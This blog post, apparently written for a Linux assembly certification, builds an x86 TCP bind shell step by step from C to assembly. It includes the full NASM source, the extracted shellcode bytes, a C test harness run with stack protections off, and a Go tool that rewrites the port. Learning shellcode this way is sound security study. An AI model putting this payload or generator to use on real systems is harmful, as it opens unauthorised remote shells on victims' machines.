Like everyone else, I have been swapping payloads within the exploits with few key-presses. Metasploit and Msfvenom are such wonderful tools that they ease out most of the work.

However, there is a lot that goes on when you generate a payload using msfvenom. In this post, we will create an x86 TCP Bind Shellcode in assembly language. This assignment was pretty fascinating to much as it was my first attempt at shellcoding. I will cover the following in this post:

  • Create a TCP bind shell that listens over port 4444
  • Create a wrapper script to make the port easily reconfigurable

This post is first in the series of posts in which I will show some demonstration of assembly concepts and write programs.

Where to start ?

This was my first thought. I didn’t know how exactly should I start writing a shellcode in assembly; though I had been given a pretty good understanding of x86 assembly by Vivek.

Upon research, I found that the best way to move forward is to study a proof of concept in a high level language such as C, break down the code and extract the relevant information so that it can be translated into assembly. Specifically, following is the approach that I followed:

Analyzing the C proof of concept

Here is the C code for TCP bind shell:

#include <stdio.h> 
#include <sys/types.h>  
#include <sys/socket.h> 
#include <netinet/in.h> 

int host_sockid;    // socket file descriptor 
int client_sockid;  // client file descriptor 

struct sockaddr_in hostaddr;            // server aka listen address

int main() 
{ 
    // Create new TCP socket 
    host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

    // Initialize sockaddr struct to bind socket using it 
    hostaddr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    hostaddr.sin_port = htons(4444);                // server port, converted to network byte order
    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   // listen to any address, converted to network byte order

    // Bind socket to IP/Port in sockaddr struct 
    bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); 

    // Listen for incoming connections 
    listen(host_sockid, 2); 

    // Accept incoming connection 
    client_sockid = accept(host_sockid, NULL, NULL); 

    // Duplicate file descriptors for STDIN, STDOUT and STDERR 
    dup2(client_sockid, 0); 
    dup2(client_sockid, 1); 
    dup2(client_sockid, 2); 

    // Execute /bin/sh 
    execve("/bin/sh", NULL, NULL); 
    close(host_sockid); 

    return 0; 
}

The C code is well commented and it is easy to step into each line and understand what is going on. Upon reading the code, it is evident that we are working with sockets. There are various functions being invoked. The code can be broken down into the following:

  1. Create a socket
  2. Bind the socket to a local port
  3. Listen for a connection
  4. Accept an incoming connection
  5. Duplicate the file descriptors for STDIN, STDOUT and STDERR
  6. Execute the shell

As mentioned earlier, our aim is to translate each section of code in x86 assembly. Each function invoked in this C code actually corresponds to an underlying sycall in Linux. Let us walk through each syscall, identify the values that need to be passed and craft the corresponding assembly code.

Create a Socket

The first step is to create a socket. The relevant C code snippet is below:

host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

The C code tells us that the socket syscall needs to be invoked. A quick reference to the /usr/include/i386-linux-gnu/asm/unistd_32.h file reveals the syscall number of the socketcall syscall

#define __NR_socketcall 102

The sycall number associated with socketcall is 102. The man reference shows the parameters of this syscall:

int socketcall(int call, unsigned long *args);

We can reference the different function call of socketcall syscall in /usr/include/linux/net.h. Following snippet shows the syscalls we need to invoke for a TCP bind shell. Please make a note as this will be referenced in later parts of the post too.

#ifndef _LINUX_NET_H
#define _LINUX_NET_H

#include <linux/socket.h>
#include <asm/socket.h>

#define NPROTO          AF_MAX

#define SYS_SOCKET      1               /* sys_socket(2)                */
#define SYS_BIND        2               /* sys_bind(2)                  */
#define SYS_CONNECT     3               /* sys_connect(2)               */
#define SYS_LISTEN      4               /* sys_listen(2)                */
#define SYS_ACCEPT      5               /* sys_accept(2)                */

As shown, to create a socket, the value of the call will be “1”. The args will then point to arguments of socket syscall.

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNA1
socketcallargsPoints to a block containing the actual argumentsNA<address of socket syscall arguments>

The man reference of the socket syscall is below:

int socket(int domain, int type, int protocol);

Let’s look at each argument and refer our proof of concept C code for values being passed in it.

SyscallArgumentMan referenceC code reference
socketdomainSpecifies a communication domain; this selects the protocol family which will be used for communicationPF_INET
sockettypeThe socket has the indicated type, which specifies the communication semanticsSOCK_STREAM
socketprotocolSpecifies a particular protocol to be used with the socket0

The value of domain can be found at/usr/include/i386-linux-gnu/bits/socket.h; which refers to the IPv4 family. PF_INET is a synonym for AF_INET.

#define PF_INET         2       /* IP protocol family.  */
#define AF_INET         PF_INET

The value of type can be found at/usr/include/i386-linux-gnu/bits/socket_type.h; which refers to connection oriented stream.

  SOCK_STREAM = 1,              /* Sequenced, reliable, connection-based byte streams.  */

The value of protocol can be found at/usr/include/linux/in.h; which refers to TCP protocol

IPPROTO_IP = 0, /* Dummy protocol for TCP */

The table below is updated with values of all arguments for socketcall syscall which calls socket syscall.

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNAEBX – 1
socketcallargsPoints to a block containing the actual argumentsNAECX – <address of arguments of socket syscall>
socketdomainSpecifies a communication domain; this selects the protocol family which will be used for communicationPF_INET2
sockettypeThe socket has the indicated type, which specifies the communication semanticsSOCK_STREAM1
socketprotocolSpecifies a particular protocol to be used with the socket00

As we have the all the data with us, we can now move forward to write the assembly code to create a socket.

global _start

section .text

_start:

; Creating a socket

        ; move decimal 102 in eax - socketcall syscall
        xor eax, eax
        mov al, 0x66    ;converted to hex

        ; set the call argument to 1 - SOCKET syscall
        xor ebx, ebx
        mov bl, 0x1

        ; push value of protocol, type and domain on stack - socket syscall
        ; int socket(int domain, int type, int protocol);
        ; arguments pushed in reverse order
        xor ecx, ecx
        push ecx        ; Protocol = 0
        push 0x1        ; Type = 1 (SOCK_STREAM)
        push 0x2        ; Domain = 2 (AF_INET)

        ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall
        mov ecx, esp

        int 0x80

This completes our first and important stage of the assembly program. We can now follow the same approach in evaluating other sycalls and writing the assembly code.

Bind the Socket

The relevant C code snippet for bind syscall is below:

// Initialize sockaddr struct to bind socket using it 
    hostaddr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    hostaddr.sin_port = htons(4444);                // server port, converted to network byte order
    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   // listen to any address, converted to network byte order

 // Bind socket to IP/Port in sockaddr struct 
 bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); 

We will invoke bind syscall function from socketcall syscall. To bind the socket, the value of the call will be “2” (as referenced from net.h earlier). The args will then point to arguments of bind syscall.

The man reference of the bind syscall is below:

int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);

Again, let’s look at each argument and refer our proof of concept C code for values being passed in it.

SyscallArgumentMan referenceC code reference
socketcallcallDetermines which socket function to invokeNA
socketcallargsPoints to a block containing the actual argumentsNA
bindsockfdbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
host_sockid
bindaddrbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
&hostaddr
bindaddrlenaddrlen specifies the size, in bytes, of the address structure pointed to by addrsizeof(hostaddr)

The first argument, which is sockfd, is nothing but the return value of previous syscall; which is a socket file descriptor returned by socket syscall.

The addr argument is a bit interesting. If you look closely in the man reference, you will notice that addr points to sockaddr structure, which is defined as follows:

struct sockaddr_in {
   short int            sin_family;
   unsigned short int   sin_port;
   struct in_addr       sin_addr;
   unsigned char        sin_zero[8];
};

Let’s port this structure into a table and map it to the C code

Structure elementsDescriptionC reference
sin_familyRepresents an address familyAF_INET
sin_port16-bit port number in Network Byte Order4444
sin_addr32-bit IP address in Network Byte OrderINADDR_ANY
sin_zeroNot usedNA

As the address family is IPv4, the value of sin_family will PF_INET/AF_INET and the integer value will be same as that in previous syscall.

Let’s keep the value of sin_port as 4444; the port on which our shell will listen and the remote attacker will connect. 4444 converts to 115c in hex. To push it onto the stack, we need to reverse the order i.e 5c11; which is due to little endian format.

We want our port to listen all all interfaces, so the equivalent of INADDR_ANY will be 0.0.0.0, if needs to be passed as value in registers.

The last argument addrlen will be 16, which is the size of sockaddr_in structure

The table below is updated with values of all arguments for socketcall syscall, which calls the bind syscall:

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNAEBX – 2
socketcallargsPoints to a block containing the actual argumentsNAECX – <address of arguments of bind syscall>
bindsockfdbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
host_sockidEDX – <return value from socket syscall>
bindaddrbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
&hostaddrESI – <address of sockaddr_in struct>
bindaddrlenaddrlen specifies the size, in bytes, of the address structure pointed to by addrsizeof(hostaddr)16

The values for sockaddr_in structure is also summarized below:

Structure elementsDescriptionC referenceValue
sin_familyRepresents an address familyAF_INET2
sin_family16-bit port number in Network Byte Order44440x5c11
sin_addr32-bit IP address in Network Byte OrderINADDR_ANY0x00000000
sin_zeroNot usedNANA

Using the above information, the following assembly code for bind syscall is created.

; Binding a socket

        ; save return value of socket syscall - socket file descriptor
        xor edx, edx
        mov edx, eax

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66    ;converted to hex

        ; set the call argument to 2 - bind syscall
        mov bl, 0x2

        ; push sockaddr structure on the stack
        ; struct sockaddr {
        ;       sa_family_t sa_family;
        ;       char        sa_data[14];
        ;       }
        xor ecx, ecx
        push ecx                ; s_addr = any(0.0.0.0)
        push word 0x5c11        ; port = 4444
        push word 0x2           ; family = AF_INET

        mov esi, esp            ; save address of sockaddr struct

        ; push values of addrlen, addr and sockfd on the stack
        ; bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr));
        push 0x10               ; strlen =16
        push esi                ; address of sockaddr structure
        push edx                ; file descriptor returned from socket syscall

        ; set value of ecx to point to top of stack - points to block of arguments for bind syscall
        mov ecx, esp
        int 0x80

Listen for a connection

The relevant C code snippet for the listen function is below:

    // Listen for incoming connections 
    listen(host_sockid, 2); 

We will invoke listen syscall function from socketcall syscall. To listen, the value of the call will be “4” (as referenced from net.h earlier). The args will then point to arguments of listen syscall.

The man reference of the listen syscall is below:

 int listen(int sockfd, int backlog);

The arguments and reference to C code is below:

SyscallArgumentMan referenceC code reference
socketcallcallDetermines which socket function to invokeNA
socketcallargsPoints to a block containing the actual argumentsNA
listensockfdFile descriptor that refers to a socket of type SOCK_STREAM or SOCK_SEQPACKEThost_sockid
listenbacklogDefines the maximum length to which the queue of pending connections for sockfd may grow2

The first argument, sockfd, is same as in bind sycall, which the return value of socket syscall.

Argument backlog defines a queue limit for incoming connections. After the queue is full, the connecting clients will get a connection refused error. Let’s keep this value same as in the C code.

The table below is updated with values of all arguments for socketcall syscall, which calls the listen syscall:

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNAEBX – 4
socketcallargsPoints to a block containing the actual argumentsNAECX – <address of arguments of listen syscall>
listensockfdFile descriptor that refers to a socket of type SOCK_STREAM or SOCK_SEQPACKEThost_sockidEDX – <return value of socket syscall>
listenbacklogDefines the maximum length to which the queue of pending connections for sockfd may grow22

Using the above information, the following assembly code for listen syscall is created.

; Listen for a connection

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66    ;converted to hex

        ; set the call argument to 4 - listen syscall
        mov bl, 0x4

        ; push arguments for socketcall syscall
        ; int listen(int sockfd, int backlog)
        push byte 0x2
        push edx

        ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall
        mov ecx, esp
        int 0x80

Accept Incoming Connection

The relevant C code snippet for accept syscall is below:

// Accept incoming connection 
    client_sockid = accept(host_sockid, NULL, NULL); 

We will invoke accept syscall function from socketcall syscall. To accept the incoming connection, the value of the call will be “5” (as referenced from net.h earlier). The args will then point to arguments of accept syscall.

The man reference of the accept syscall is below:

int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);

This is pretty straightforward. The value of argument sockfd will be same as that in previous syscalls i.e. return value of socket syscall. The next two arguments can be ignored and set to “0” as they are used to capture the connecting client’s details, which we do not wish to capture. So, the values of arguments for socketcall syscall and accept sycall are below:

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNAEBX – 5
socketcallargsPoints to a block containing the actual argumentsNAECX – <address of arguments of accept syscall>
acceptsockfdFile descriptor that refers to a socket of type SOCK_STREAM or SOCK_SEQPACKEThost_sockidEDX – <return value of socket syscall>
acceptaddrPointer to a sockaddr structure; filled in with the address of the peer socketNULL0
acceptaddrlenValue-result argument: the caller must initialize it to contain the size (in bytes) of the structure pointed to by addrNULL0

Using the above information, the following assembly code for accept syscall is created.

; Accept a connection

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66


        ; set the call argument to 5 - accept syscall
         mov bl, 0x5

        ; push arguments for socketcall syscall
        ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
        xor ecx, ecx
        push ecx
        push ecx
        push edx

        ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall
        mov ecx, esp
        int 0x80

Redirect STDIN, STDOUT and STDERR via DUP2

For the bind shell to be interactive and to actually work, we need to redirect the STDIN, STDOUT and STDERR to client socket file descriptor created in previous syscall.

The relevant C code snippet for dup2 syscall is below:

// Duplicate file descriptors for STDIN, STDOUT and STDERR 
 dup2(client_sockid, 0); 
 dup2(client_sockid, 1); 
 dup2(client_sockid, 2); 

The man reference of dup2 syscall is below:

int dup2(int oldfd, int newfd);

The dup2 system call creates a copy of the file descriptor oldfd, using the file descriptor number specified in newfd. So, we will need to loop over dup2 call three times to map STDIN, STDOUT, STDERR to 0, 1 and 2 respectively.

SyscallArgumentMan referenceC code referenceValue
dup2oldfdfile descriptorclient_sockidEBX – <return value from accept syscall – client socket file descriptor>
acceptnewfdfile descriptor0, 1 and 2 (three syscalls)0, 1 and 2 (three syscalls)

Using the above information, the following assembly code for dup2 syscalls is created.

; Duplicate file descriptors

        ; eax holds return value of previous syscall - accept - client_sockid
        ; client socket file descriptor
        push eax

        ; push arguments for dup2 syscall
        ; int dup2(int oldfd, int newfd);
        ; dup2 syscall - setting STDIN;
        mov al, 0x3f    ; move decimal 63; coverted to hex - dup2 syscall
        pop ebx         ; set ebx to client sockid
        xor ecx, ecx
        int 0x80

        ; dup2 syscall - setting STDOUT
        mov al, 0x3f   ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x1
        int 0x80

        ; dup2 syscall - setting STDERR
        mov al, 0x3f   ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x2
        int 0x80

Execute /bin/sh

We are almost at the end of the post. We have successfully knitted the program to handle the sockets. Now once the client connects, we need to execute /bin/sh to spawn a shell. For this, we need execve syscall.

The relevant C code snippet for execve syscall is below:

// Execute /bin/sh 
execve("/bin/sh", NULL, NULL); 

The man reference of the execve syscall is below:

int execve(const char *pathname, char *const argv[], char *const envp[]);

The only part interesting for us is the pointer to pathname, which is the file which we want to execute. In our case, that is /bin/sh.

As “/bin/sh” is of 7 bytes, we can add an additional “/” to make it 8, which is easier for us to push on the stack. So, pathname will be “//bin/sh” (which is same as /bin/sh; adding “/” does not make a difference !)

As mentioned previously, “//bin/sh” will be pushed on the stack in reverse due to little endian format. Also, as we are dealing with filename/string, this has to be null terminated.

The final data looks like this:

SyscallArgumentMan referenceC code referenceValue
execve*pathnameExecve() executes the program referred to by pathname/bin/shhs/nib//0x00000000
execveargv[]Array of pointers to strings passed to the new program as its command-line argumentsNULL0
execveenvp[]Array of pointers to strings, conventionally of the form key=value, which are passed as the environment of the new programNULL0

Translating this to assembly, we have the following code:

; Execute /bin/sh

        ; exeve syscall
        mov al, 0xb

        ; int execve(const char *pathname, char *const argv[], char *const envp[]);
        ; push //bin/sh on stack
        xor ebx, ebx
        push ebx                ; Null
        push 0x68732f6e         ; hs/n : 68732f6e
        push 0x69622f2f         ; ib// : 69622f2f
        mov ebx, esp

        xor ecx, ecx
        xor edx, edx

        int 0x80

That’s it ! We have drafted the shellcode completely. The complete program is as follows:

; Purpose:      Linux x86 Bind Shell
; Author:       Mohit Suyal (@mosunit)
; Studen ID:    PA-16521
; Blog:         https://mosunit.com

global _start

section .text

_start:

; Creating a socket

        ; move decimal 102 in eax - socketcall syscall
        xor eax, eax
        mov al, 0x66    ;converted to hex

        ; set the call argument to 1 - SOCKET syscall
        xor ebx, ebx
        mov bl, 0x1

        ; push value of protocol, type and domain on stack - socket syscall
        ; int socket(int domain, int type, int protocol);
        ; arguments pushed in reverse order
        xor ecx, ecx
        push ecx        ; Protocol = 0
        push 0x1        ; Type = 1 (SOCK_STREAM)
        push 0x2        ; Domain = 2 (AF_INET)

        ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall
        mov ecx, esp

        int 0x80

; Binding a socket

        ; save return value of socket syscall - socket file descriptor
        xor edx, edx
        mov edx, eax

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66    ;converted to hex

        ; set the call argument to 2 - bind syscall
        mov bl, 0x2

        ; push sockaddr structure on the stack
        ; struct sockaddr {
        ;       sa_family_t sa_family;
        ;       char        sa_data[14];
        ;       }
        xor ecx, ecx
        push ecx                ; s_addr = any(0.0.0.0)
        push word 0x5c11        ; port = 4444
        push word 0x2           ; family = AF_INET

        mov esi, esp            ; save address of sockaddr struct

        ; push values of addrlen, addr and sockfd on the stack
        ; bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr));
        push 0x10               ; strlen =16
        push esi                ; address of sockaddr structure
        push edx                ; file descriptor returned from socket syscall

        ; set value of ecx to point to top of stack - points to block of arguments for bind syscall
        mov ecx, esp
        int 0x80

; Listen for a connection

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66    ;converted to hex

        ; set the call argument to 4 - listen syscall
        mov bl, 0x4

        ; push arguments for socketcall syscall
        ; int listen(int sockfd, int backlog)
        push byte 0x2
        push edx

        ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall
        mov ecx, esp
        int 0x80

; Accept a connection

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66


        ; set the call argument to 5 - accept syscall
         mov bl, 0x5

        ; push arguments for socketcall syscall
        ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
        xor ecx, ecx
        push ecx
        push ecx
        push edx

        ;set value of ecx to point ot top of stack - points to block of arguments for listen syscall
        mov ecx, esp
        int 0x80

; Duplicate file descriptors

        ; eax holds return value of previous syscall - accept - client_sockid
        ; client socket file descriptor
        push eax

        ; push arguments for dup2 syscall
        ; int dup2(int oldfd, int newfd);
        ; dup2 syscall - setting STDIN;
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        pop ebx                 ; set ebx to client sockid
        xor ecx, ecx
        int 0x80

        ; dup2 syscall - setting STDOUT
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x1
        int 0x80

        ; dup2 syscall - setting STDERR
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x2
        int 0x80

; Execute /bin/sh

        ; exeve syscall
        mov al, 0xb

        ; int execve(const char *pathname, char *const argv[], char *const envp[]);
        ; push //bin/sh on stack
        xor ebx, ebx
        push ebx                ; Null
        push 0x68732f6e         ; hs/n : 68732f6e
        push 0x69622f2f         ; ib// : 69622f2f
        mov ebx, esp

        xor ecx, ecx
        xor edx, edx

        int 0x80

The next step is to assemble and link the the code.

root@kali:~/slae/assignments/assignment-1# nasm -f elf32 -o bind_shell_x86.o bind_shell.nasm

root@kali:~/slae/assignments/assignment-1# ld -o bind_shell_x86 bind_shell_x86.o

root@kali:~/slae/assignments/assignment-1# ls -l |grep x86
-rwxr-xr-x 1 root root  4600 Jul 10 14:56 bind_shell_x86
-rw-r--r-- 1 root root   544 Jul 10 14:56 bind_shell_x86.o

root@kali:~/slae/assignments/assignment-1# file bind_shell_x86
bind_shell_x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped

As shown above, the ouput is an elf executable. Let’s extract the shellcode from this by using an awesome command line magic taught by Vivek, which has been extracted from Commandlinefu

The output is a neat shellcode, which can be directly embedded in our shellcode tester program in C. Also, note that the shellcode is free from any null bytes.

root@kali:~/slae/assignments/assignment-1# objdump -d bind_shell_x86 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2\x89\xc2\xb0\x66\xb3\x02\x31\xc9\x51\x66\x68\x11\x5c\x66\x6a\x02\x89\xe6\x6a\x10\x56\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x02\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1\xcd\x80\x50\xb0\x3f\x5b\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb0\x0b\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xcd\x80"

Our C code looks like this once the shellcode is embedded:

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2\x89\xc2\xb0\x66\xb3\x02\x31\xc9\x51\x66\x68\x11\x5c\x66\x6a\x02\x89\xe6\x6a\x10\x56\x52\x89\xe1\xcd\x80
\xb0\x66\xb3\x04\x6a\x02\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1\xcd\x80\x50\xb0\x3f\x5b\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb0\x0b\x31\
xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xcd\x80";

main()

{
        printf("Shellcode length: %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
}

The final step is to compile this using gcc. We need to add fno-stack-protector to unprotect the stack and execstack to make the stack executable.

root@kali:~/slae/assignments/assignment-1# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
    7 | main()
      | ^~~~

Let’s run it and connect to port 4444 to check if a shell is spawned

And there we have it ! A TCP bind shell on port 4444.

Shellcode with reconfigurable port !

The next task at hand is to make the bind port in the shellcode reconfigurable.

I did some rusty work in Go on this. The program has hardcoded shellcode that we generated earlier. It takes the new port as input and replaces the respective part of the shellcode with new port number.

/*
Tool:		Linux Bind Shell(x86) Port Configurator
Author:		Mohit Suyal (@mosunit)
Student ID:	PA-16521
Blog:		https://mosunit.com
*/

package main

import (
	"flag"
	"fmt"
	"os"
	"strings"
)

func main() {

	// Original shellcode - hardcoded with port 4444
	shellcode := []string{`\x31`, `\xc0`, `\xb0`, `\x66`, `\x31`, `\xdb`, `\xb3`, `\x01`, `\x31`, `\xc9`, `\x51`, `\x6a`, `\x01`, `\x6a`, `\x02`, `\x89`, `\xe1`, `\xcd`, `\x80`, `\x31`, `\xc9`, `\x31`, `\xd2`, `\x89`, `\xc2`, `\xb0`, `\x66`, `\xb3`, `\x02`, `\x51`, `\x66`, `\x68`, `\x11`, `\x5c`, `\x66`, `\x6a`, `\x02`, `\x89`, `\xe6`, `\x6a`, `\x10`, `\x56`, `\x52`, `\x89`, `\xe1`, `\xcd`, `\x80`, `\xb0`, `\x66`, `\xb3`, `\x04`, `\x6a`, `\x02`, `\x52`, `\x89`, `\xe1`, `\xcd`, `\x80`, `\xb0`, `\x66`, `\xb3`, `\x05`, `\x31`, `\xc9`, `\x51`, `\x51`, `\x52`, `\x89`, `\xe1`, `\xcd`, `\x80`, `\x50`, `\xb0`, `\x3f`, `\x5b`, `\x31`, `\xc9`, `\xcd`, `\x80`, `\xb0`, `\x3f`, `\xb1`, `\x01`, `\xcd`, `\x80`, `\xb0`, `\x3f`, `\xb1`, `\x02`, `\xcd`, `\x80`, `\xb0`, `\x0b`, `\x31`, `\xdb`, `\x53`, `\x68`, `\x6e`, `\x2f`, `\x73`, `\x68`, `\x68`, `\x2f`, `\x2f`, `\x62`, `\x69`, `\x89`, `\xe3`, `\x31`, `\xc9`, `\x31`, `\xd2`, `\xcd`, `\x80`}

	//Define flag for input
	port := flag.Int("port", -1, "port number for shellcode")
	flag.Parse()

	if *port == -1 {
		fmt.Println("Please input the port number. e.g. 9999 ")
		flag.PrintDefaults()
		os.Exit(1)
	}

	// Convert the inpurt port in hex format
	hexport := fmt.Sprintf("%x", *port)

	// Create a slice of strings to split the port into two parts
	one := make([]string, 4)
	two := make([]string, 4)

	// Create two seperate string slice to store first two and last two characters of the port converted in hex
	for i, r := range hexport {
		if i < 2 {
			one[i] = string(r)
			continue
		}
		two[i] = string(r)
	}

	// Join the string of ports to create two equal parts
	p1 := strings.Join(one[:], "")
	p2 := strings.Join(two[:], "")

	// Change the representation of the ports to hex format
	p1 = fmt.Sprintf("%s%s", "\\x", p1)
	p2 = fmt.Sprintf("%s%s", "\\x", p2)

	// Replace the respective values of port in orginal shellcode to new port provided
	shellcode[32] = p1
	shellcode[33] = p2

	// Join the slice of strings and print the shellcode
	fmt.Printf("Generating TCP bind shellcode for port number %v\nThe shellcode length is %v bytes\n\n\"%s\"", *port, len(shellcode), strings.Join(shellcode[:], ""))

}

Let’s see the tool in action. Simply run it and input the new port for the bind shell.

PS E:\<snipped>\bind_shell_port_config> go run .\bind_shell_port_config.go -port 9999
Generating TCP bind shellcode for port number 9999
The shellcode length is 114 bytes

"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xc9\x31\xd2\x89\xc2\xb0\x66\xb3\x02\x51\x66\x68\x27\x0f\x66\x6a\x02\x89\xe6\x6a\x10\x56\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x02\x52\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1\xcd\x80\x50\xb0\x3f\x5b\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb0\x0b\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xcd\x80"

Using the same approach of embedding the shellcode in the C template, compiling it and running it shows that the bind shell was available on port 9999. So, it affirms that the Go code is working and the port number in the shellcode is easily reconfigurable.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-16521

That’s it for this post. In the next post, I will cover reverse shellcode.

Thanks for reading !

Leave a Reply

Your email address will not be published.